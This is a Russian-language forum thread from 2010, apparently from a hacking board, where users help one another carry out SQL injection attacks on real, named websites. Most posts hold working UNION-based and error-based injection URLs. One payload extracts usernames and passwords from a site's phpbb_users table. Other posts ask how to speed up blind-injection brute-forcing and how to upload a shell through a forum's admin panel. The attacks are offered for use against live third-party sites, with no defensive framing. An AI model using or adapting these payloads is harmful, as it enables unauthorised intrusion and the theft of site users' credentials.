Couldn't execute query AR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AS temp_orders ON fl_orders.Email_new = temp_orders.Email_new JOIN fl_product_or' at line 6
Code:
site.ru/index.php?id=12 AS temp_orders ON fl_orders.Email_new = temp_orders.Email_new JOIN fl_product_or+--+
попробуй относительно этого крутить
Seravin said:
Code:
site.ru/index.php?id=12 AS temp_orders ON fl_orders.Email_new = temp_orders.Email_new JOIN fl_product_or+--+
попробуй относительно этого крутить
Couldn't execute query U: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AS temp_orders ON fl_orders.Email_new=temp_orders.Email_new JOIN fl_product_or -' at line 3
Вот ссылка, мне не жалко но если кто-то ковырнет раньше меня то поделитесь со всеми
http://www.flashloaded.com/cart/basket.php?action=Add&itemid=6587
[Feldmarschall]
12.08.2010, 22:04
fl00der said:
http://zurnals.maminuklubs.lv/lat/sludinajumi/?cat=48%27
Тут вот подозрения на SQL inj, т.к. при подстановке ':
http://zurnals.maminuklubs.lv/lat/sludinajumi/?cat=48%27'
выбивает пустую страничку. Но, как я не бился, при всем остальном страничка грузится, как ни в чем не бывало.
Code:
http://zurnals.maminuklubs.lv/lat/sludinajumi/?cat=-48'+union+select+1,2,3,4,5,6,7,8,9,10,concat(0x3a, version(),user(),database(),0x3a),12,13,14,15--+
happygirl
13.08.2010, 06:34
почему "substring" не показывают данные?
http://www.sudplanete.net/photo.php?menu=pers&no=8452+or+(1,2)=(select+count(0),concat((select+s ubstring(table_name,1,10)+from+information_schema. tables limit 1,1),floor(rand(0)*2))from(information_schema.tabl es)group+by+2)--+
Привет. Прочел конфиг апача, инклудятся файлы Include conf.d/*.conf, сервер redhat-linux-gnu, где по дефолту лежат конфиги виртуальных хостов?
blind делаю в адресной строке запрос php?id=11+AND+ascii(lower(substring(user(),1,1)))>115
долго очень перебирать имя юзера, можно ли через sipt
ускорить перебор? каков должен быть запрос в сипт?
(user(),{N1-115},1 или ?????
daniel_1024
13.08.2010, 22:26
toolza 1.0 (https://antichat.live/threads/148915/) лучше всего для блинда будет
Можно ли залить шелл через админку mybb 1.4.13? если да,то как?
Помогите, пожалуйста, найти OpenX на сайте zurnals.maminuklubs.lv или он на верхнем поддомене, я уж обыскался, но не могу найти этот скрипт. Он там есть, версия 2.8.
Koren said:
blind делаю в адресной строке запрос php?id=11+AND+ascii(lower(substring(user(),1,1)))>115
долго очень перебирать имя юзера, можно ли через sipt
ускорить перебор? каков должен быть запрос в сипт?
(user(),{N1-115},1 или ?????
user()
InfectedM
14.08.2010, 22:52
Подскажите плиз как в этой скуле узнать кол-во полей
http://www.globalresponse.org/gra.php?i=current')+Union+select+1,2,3,4,5--
InfectedM said:
Подскажите плиз как в этой скуле узнать кол-во полей
http://www.globalresponse.org/gra.php?i=current'+or+(1,1)=(select+count(0),conca t((select+version()+from+information_schema.tables +limit+0,1),floor(rand(0)*2))from(information_sche ma.tables)+group+by+2)--+
InfectedM said:
Подскажите плиз как в этой скуле узнать кол-во полей
Code:
http://www.globalresponse.org/gra.php?i=current%27+union+select+1,2,3,4,5,6,7,8, 9,10,12,13,14,15,16,17,18,19,20,21,22,23--+
опередил
А вот похенк)
Code:
http://www.globalresponse.org/gra.php?i=current%27+union+select+1,2,3,4,concat_w s%280x3a,username,user_password%29,6,7,8,9,10,12,1 3,14,15,16,17,18,19,20,21,22,23+from+phpbb_users+l imit+1,1--+
IMMORTAL_S
15.08.2010, 15:54
Подскажите, каким алгоритмом шифруются пасы в redmine?
Electr0n
15.08.2010, 18:34
Почему инфу не выводит?
Слепая инъекция...
Code:
http://www.experienceegypt.info/templates/contactus.php?id=116+union+select+1,2,3,4,5,6--
.:[melkiy]:.
15.08.2010, 18:44
Electr0n said:
Почему инфу не выводит?
Слепая инъекция...
Code:
http://www.experienceegypt.info/templates/contactus.php?id=116+union+select+1,2,3,4,5,6--
_http://www.experienceegypt.info/templates/contactus.php?id=-116+union+select+1,2,version(),4,5,6,7,8,9+--+
о чём это говорит? You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union*/ /*!select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- )) ORD' at line 1
недопустимые символы? или же?
как только не пробывал фильтровать
ответ один и тот же.. либы ошибка(фильтр) или вот это сообщение
Koren said:
о чём это говорит? You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union*/ /*!select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- )) ORD' at line 1
недопустимые символы? или же?
как только не пробывал фильтровать
ответ один и тот же.. либы ошибка(фильтр) или вот это сообщение
Синтаксис нарушен. Либо скобка не закрыта либо еще что-то. Но ошибка не из-за фильтрации чего либо.
такой вопрос: видел где то раскручивали скулю на asp?ID=15 поискав немного не нащёл
реально ведь вообще? можно пример привести + хотелось бы увидеть линк на статью по этой теме если есть
так же столкнулся ещё с такой проблемой...
http://www.tall.com/detail.php?itemid=7565&size=454/fuck
иньекция есть, 1 колонка вывод данныех недоступен(
посмотрите плыз
да и по первому вопросу оч нуждаюсь в ответе
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot